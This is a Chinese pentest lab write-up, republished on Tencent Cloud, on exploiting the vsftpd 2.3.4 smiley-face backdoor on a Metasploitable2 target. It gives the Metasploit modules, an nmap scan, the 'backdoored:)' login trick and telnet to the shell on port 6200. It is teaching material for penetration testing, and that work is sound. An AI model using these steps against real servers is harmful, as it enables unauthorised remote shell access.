前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【端口渗透】21端口vsftpd服务后门

【端口渗透】21端口vsftpd服务后门

作者头像
用户1467662
发布2018-03-30 12:39:09
4.7K0
发布2018-03-30 12:39:09
举报
文章被收录于专栏:农夫安全

准备写一个专门关于端口渗透的一些小集合,每一篇代表一个端口对应的渗透方法,算不上什么牛逼的技术,但是对于实战时候还是具有一定的参考价值,之前已经发放了大概4-5枚的知识星球邀请码,如想加入可扫描二维码或直接来稿。

0x01 21端口

>use auxiliary/scanner/ftp/ftp_version探测版本 >search vsFTPd 2.3.4 版本号>use exploit/unix/ftp/vsftpd_234_backdoor>show options

0x02 后门
(1)在kali linux中启用metasploit

操作:打开kali linux的命令控制台,输入msfconsole。

实验现象截图:

(2)使用扫描工具nmap对目标靶机进行扫描

操作:nmap -p0-65535 192.168.1.145

实验现象截图:

Metasploitable2(靶机) 在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击

(3)远程登录到靶机放入21端口

操作:root@kali:~# telnet 192.168.1.145 21

实验现象截图:

(4)由扫描结果看,在21端口上运行着vsftpd服务,这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击。

操作:发送一个用户名并且后面加上”:)“(笑脸符号),和密码

user backdoored:)

Pass invalid

实验现象截图:

(5)关闭远程登陆,并远程登录到靶机的6200端口,利用后门成功

操作:root@kali:~# telnet 192.168.1.145 6200

实验现象截图:

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-10-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 21端口
  • 0x02 后门
  • (1)在kali linux中启用metasploit
  • (2)使用扫描工具nmap对目标靶机进行扫描
  • (3)远程登录到靶机放入21端口
  • (4)由扫描结果看,在21端口上运行着vsftpd服务,这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击。
  • (5)关闭远程登陆,并远程登录到靶机的6200端口,利用后门成功
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档